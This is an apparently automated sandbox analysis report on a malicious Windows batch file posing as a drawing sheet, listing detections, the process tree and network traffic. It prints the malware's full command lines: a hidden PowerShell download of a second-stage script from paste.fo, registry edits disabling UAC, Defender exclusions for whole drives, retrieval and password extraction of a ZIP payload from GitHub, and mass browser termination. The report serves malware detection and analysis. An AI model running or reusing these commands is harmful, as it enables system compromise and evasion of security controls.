Windows Analysis Report
NEW-DRAWING-SHEET.bat

Overview

General Information

Sample name: NEW-DRAWING-SHEET.bat
Analysis ID: 1582348
MD5: 6b9cf24f2b691606642bd18bf2227a62
SHA1: 046ab52fa2f7fd4a6487d3ddcd58dd7f08f157bc
SHA256: f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1
Tags: bat, knkbkk212, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Disables UAC (registry)
Drops password protected ZIP file
Excessive usage of taskkill to terminate processes
Loading BitLocker PowerShell Module
Sigma detected: PowerShell DownloadFile
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses cmd line tools excessively to alter registry or file data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: File Download From Browser Process Via Inline URL
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • cmd.exe (PID: 7332 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7384 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7440 cmdline: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7656 cmdline: powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat'))" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7744 cmdline: "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat / MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 7788 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 7820 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 7864 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 7992 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 8044 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 8084 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 8184 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 3760 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 5332 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 4108 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 7880 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 1396 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • powershell.exe (PID: 8188 cmdline: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 8472 cmdline: PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 8760 cmdline: PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 8872 cmdline: PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 8992 cmdline: PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 9100 cmdline: PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • chrome.exe (PID: 7884 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 7408 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1980,i,6972678540709667438,18385464693239191531,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • timeout.exe (PID: 7984 cmdline: timeout /t 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • 7z.exe (PID: 8672 cmdline: "C:\Program Files\7-Zip\7z.exe" x "C:\Users\user\Downloads\DOC.zip" -o"C:\Users\user\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963 MD5: 9A1DD1D96481D61934DCC2D568971D06)
      • timeout.exe (PID: 8744 cmdline: timeout /t 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • taskkill.exe (PID: 4108 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 2640 cmdline: taskkill /F /IM firefox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 7860 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 5900 cmdline: taskkill /F /IM iexplore.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 5552 cmdline: taskkill /F /IM opera.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 7596 cmdline: taskkill /F /IM safari.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 5804 cmdline: taskkill /F /IM brave.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 8224 cmdline: taskkill /F /IM vivaldi.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 8288 cmdline: taskkill /F /IM epic.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 7956 cmdline: taskkill /F /IM yandex.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 3336 cmdline: taskkill /F /IM tor.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 5652 cmdline: taskkill /F /IM CMD.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
  • svchost.exe (PID: 8152 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
NEW-DRAWING-SHEET.bat | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: powershell.exe PID: 7440 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_7440.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_7656.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7384, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", ProcessId: 7440, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7744, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 8188, ProcessName: powershell.exe
Source: File created; Author: Subhash Popuri (@pbssubhash); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7440, TargetFilename: C:\Users\user\AppData\Local\Temp\BatchByloadStartHid.bat
Source: Process started; Author: frack113; Data: Command: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7384, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", ProcessId: 7440, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip, CommandLine|base64offset|contains: -j~b,, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7384, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip, ProcessId: 7884, ProcessName: chrome.exe
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7440, TargetFilename: C:\Users\user\AppData\Local\Temp\BatchByloadStartHid.bat
Source: Process started; Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro; Data: Command: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7384, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", ProcessId: 7440, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7384, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", ProcessId: 7440, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7744, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 8188, ProcessName: powershell.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7384, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", ProcessId: 7440, ProcessName: powershell.exe
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7384, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", ProcessId: 7440, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7384, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", ProcessId: 7440, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8152, ProcessName: svchost.exe
No Suricata rule has matched

AV Detection

Source: NEW-DRAWING-SHEET.bat; Virustotal: Detection: 34%
Source: NEW-DRAWING-SHEET.bat; ReversingLabs: Detection: 23%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.5% probability
Source: unknown; HTTPS traffic detected: 172.67.144.225:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: global traffic; HTTP traffic detected: GET /raw/a1af5a4d0301 HTTP/1.1 | Host: paste.fo | Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 239.255.255.250
Source: Joe Sandbox View; IP Address: 185.199.111.133
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown; TCP traffic detected without corresponding DNS query: 2.22.50.144
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected: GET /knkbkk212/knkbkk212/refs/heads/main/DOC.zip HTTP/1.1 | Host: raw.githubusercontent.com | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | sec-ch-ua-platform: "Windows" | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Sec-Fetch-Site: none | Sec-Fetch-Mode: navigate | Sec-Fetch-User: ?1 | Sec-Fetch-Dest: document | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic; DNS traffic detected: DNS query: paste.fo
Source: global traffic; DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic; DNS traffic detected: DNS query: www.google.com
Source: svchost.exe, 00000011.00000002.2922057231.000001EB8E600000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000011.00000003.1822496548.000001EB8E378000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.17.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.17.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.17.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000011.00000003.1822496548.000001EB8E378000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000011.00000003.1822496548.000001EB8E378000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000011.00000003.1822496548.000001EB8E3AD000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.17.dr; String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000004.00000002.1763771377.00000218EA546000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763771377.00000218EA403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1742423417.00000218DBD60000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.1742423417.00000218DB9C1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://paste.fo
Source: powershell.exe, 00000004.00000002.1742423417.00000218DBC16000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.1742423417.00000218DA391000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1742423417.00000218DBA10000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000004.00000002.1742423417.00000218DBC16000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
